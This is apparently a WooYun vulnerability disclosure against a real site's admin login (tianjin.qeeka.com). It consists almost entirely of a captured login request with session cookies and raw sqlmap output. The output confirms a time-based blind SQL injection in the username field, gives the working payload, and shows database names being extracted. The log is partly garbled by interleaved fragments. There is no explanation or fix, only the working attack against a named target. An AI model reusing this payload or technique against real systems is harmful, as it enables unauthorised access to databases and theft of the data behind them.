WooYun.org

http://tianjin.qeeka.com/admin.jsp

POST /admin.jsp?run-login/login-show-json-ajax-1 HTTP/1.1 Host: tianjin.qeeka.com Content-Length: 73 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://tianjin.qeeka.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://tianjin.qeeka.com/admin.jsp?show-login/login-layout-1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: IPLOC=CN4400; SUV=1507272131420486; ssl=false; JSESSIONID=D7EAD746DFA35CC675B49094864A4F89; BAIDU_DUP_lcr=https://www.baidu.com/link?url=jVhSOrrCSblqpNdM6fjxKU5sAUcm1Q4yHR_vFFAEmxRTzvKKnJOJ4AiIgAnuUg9d&wd=&eqid=9dcb644f000017400000000255b97e39 login%5Busername%5D=admin&login%5Bpassword%5D=admin&login%5BappId%5D=mzmf

sqlmap resumed the following injection point(s) from stored session: --- Parameter: login[username] (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: login[username]=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))lLy ND 'lgZA'='lgZA&login[password]=admin&login[appId]=mzmf --- [09:41:20] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5.0.12 [09:41:20] [INFO] fetching database names [09:41:20] [INFO] fetching number of databases [09:41:20] [WARNING] time-based comparison requires larger statistical model ease wait.............................. do you want sqlmap to try to optimize value(s) for DBMS delay responses (opt '--time-sec')? [Y/n] y [09:41:42] [WARNING] it is very important not to stress the network adapter ng usage of time-based payloads to prevent potential errors [09:41:54] [INFO] adjusting time delay to 3 seconds due to good response tim 6 [09:41:55] [INFO] retrieved: [09:42:19] [ERROR] invalid character detected. retrying.. [09:42:19] [WARNING] increasing time delay to 4 seconds in [09:43:18] [ERROR] invalid character detected. retrying.. [09:43:18] [WARNING] increasing time delay to 5 seconds form [09:45:31] [ERROR] invalid character detected. retrying.. [09:45:31] [WARNING] increasing time delay to 6 seconds [09:45:54] [ERROR] invalid character detected. retrying.. [09:45:54] [WARNING] increasing time delay to 7 seconds a [09:46:51] [ERROR] invalid character detected. retrying.. [09:46:51] [WARNING] increasing time delay to 8 seconds tion_sc [09:51:44] [ERROR] unable to properly validate last character value ('i').. iema [09:52:30] [ERROR] invalid character detected. retrying.. [09:52:30] [WARNING] increasing time delay to 4 seconds [09:52:32] [INFO] retrieved: commonservice [09:59:26] [INFO] retrieved: [10:00:02] [ERROR] invalid character detected. retrying.. [10:00:02] [WARNING] increasing time delay to 5 seconds mac [10:01:31] [ERROR] invalid character detected. retrying.. [10:01:31] [WARNING] increasing time delay to 6 seconds dat [10:03:24] [ERROR] invalid character detected. retrying.. [10:03:24] [WARNING] increasing time delay to 7 seconds [10:03:52] [ERROR] invalid character detected. retrying.. [10:03:52] [WARNING] increasing time delay to 8 seconds [10:04:30] [ERROR] unable to properly validate last character value ('{').. { [10:04:35] [INFO] retrieved: m [10:05:14] [ERROR] invalid character detected. retrying.. [10:05:14] [WARNING] increasing time delay to 4 seconds [10:05:43] [ERROR] invalid character detected. retrying.. [10:05:43] [WARNING] increasing time delay to 5 seconds ysql [10:07:26] [INFO] retrieved: [10:07:55] [ERROR] invalid character detected. retrying.. [10:07:55] [WARNING] increasing time delay to 6 seconds [10:08:36] [ERROR] invalid character detected. retrying.. [10:08:36] [WARNING] increasing time delay to 7 seconds [10:09:23] [ERROR] invalid character detected. retrying.. [10:09:23] [WARNING] increasing time delay to 8 seconds secu [10:12:22] [ERROR] unable to properly validate last character value ('y').. y [10:12:41] [ERROR] invalid character detected. retrying.. [10:12:41] [WARNING] increasing time delay to 4 seconds i